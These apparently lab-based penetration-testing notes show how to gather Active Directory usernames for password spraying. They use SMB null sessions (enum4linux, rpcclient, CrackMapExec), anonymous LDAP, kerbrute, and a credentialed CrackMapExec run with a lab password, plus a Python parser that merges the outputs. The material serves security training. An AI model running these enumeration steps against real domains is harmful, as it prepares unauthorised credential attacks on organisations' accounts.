Password Spraying - Making a Target User List (Active Directory)

Using enum4linux

SMB NULL Session to Pull User List

enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
administrator
guest
krbtgt

Using rpcclient

SMB NULL Session to Pull User List

rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]

Using CrackMapExec --users Flag

SMB NULL Session to Pull User List

crackmapexec smb 172.16.5.5 --users

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain user(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\administrator                  badpwdcount: 0 baddpwdtime: 2022-01-10 13:23:09.463228
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\guest                          badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\lab_adm

Gathering Users with LDAP Anonymous

  • If the domain controller allows anonymous LDAP binds, the user list can be pulled over LDAP without credentials. Some examples of tools for this include windapsearch and ldapsearch.

Using ldapsearch

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "
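
The grep/cut pipelines above (enum4linux, rpcclient, CrackMapExec, ldapsearch) each produce a slightly different output format. The following is an added example, not part of the original notes or of any of those tools, that normalizes all four formats into one de-duplicated user list in a single pass, and keeps the badpwdcount values CrackMapExec reports so they can be reviewed alongside the names. The sample text is built from the output shown on this page plus one constructed CrackMapExec line (jsmith, badpwdcount 3) and two constructed sAMAccountName lines; the function and variable names are the example's own.

```python
import re
from typing import Dict, List, Tuple

# enum4linux -U and rpcclient enumdomusers both print: user:[name] rid:[0x...]
RID_LINE = re.compile(r"user:\[(?P<user>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")

# CrackMapExec --users prints: SMB <ip> <port> <host> DOMAIN\user [badpwdcount: N ...]
# Status lines such as "[*] Windows ..." or "[+] Enumerated ..." contain no backslash
# right after the fourth column, so they do not match.
CME_LINE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<domain>[^\\\s]+)\\(?P<user>\S+)"
    r"(?:\s+badpwdcount:\s*(?P<badpwd>\d+))?"
)

# ldapsearch LDIF output (before the cut) prints: sAMAccountName: name
LDIF_LINE = re.compile(r"^sAMAccountName:\s*(?P<user>\S+)")


def extract_users(text: str) -> Tuple[List[str], Dict[str, int]]:
    """Return (ordered, de-duplicated user list, {user: badpwdcount}) from mixed tool output.

    sAMAccountName is case-insensitive in AD, so names are lower-cased before
    comparison; the first spelling seen wins the slot in the list.
    """
    users: List[str] = []
    seen = set()
    badpwd: Dict[str, int] = {}
    for raw in text.splitlines():
        line = raw.strip()
        name = None
        m = RID_LINE.search(line)
        if m:
            name = m.group("user")
        else:
            m = CME_LINE.match(line)
            if m:
                name = m.group("user")
                if m.group("badpwd") is not None:
                    badpwd[name.lower()] = int(m.group("badpwd"))
            else:
                m = LDIF_LINE.match(line)
                if m:
                    name = m.group("user")
        if name:
            key = name.lower()
            if key not in seen:
                seen.add(key)
                users.append(key)
    return users, badpwd


# Constructed sample: the page's own output lines plus a constructed CME line for
# "jsmith" (badpwdcount: 3) and constructed sAMAccountName lines for krbtgt and jsmith.
SAMPLE_OUTPUT = r"""
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain user(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\administrator                  badpwdcount: 0 baddpwdtime: 2022-01-10 13:23:09.463228
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\lab_adm
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\jsmith                         badpwdcount: 3 baddpwdtime: 2022-01-10 13:30:00.000000
sAMAccountName: krbtgt
sAMAccountName: jsmith
"""

if __name__ == "__main__":
    names, counts = extract_users(SAMPLE_OUTPUT)
    for n in names:
        print(n, counts.get(n, "-"))
```

Feeding the raw tool output through extract_users instead of a tool-specific cut pipeline means the same list is produced whichever enumeration path worked against the target, and the badpwdcount column is preserved rather than thrown away by the cut.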

Using windapsearch

windapsearch

Enumerating Users with Kerbrute

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt 

Credentialed Enumeration to Build our User List

  • With valid credentials, any of the tools stated previously can be used to build a user list. A quick and easy way is using CrackMapExec.

Using CrackMapExec with Valid Credentials

sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users
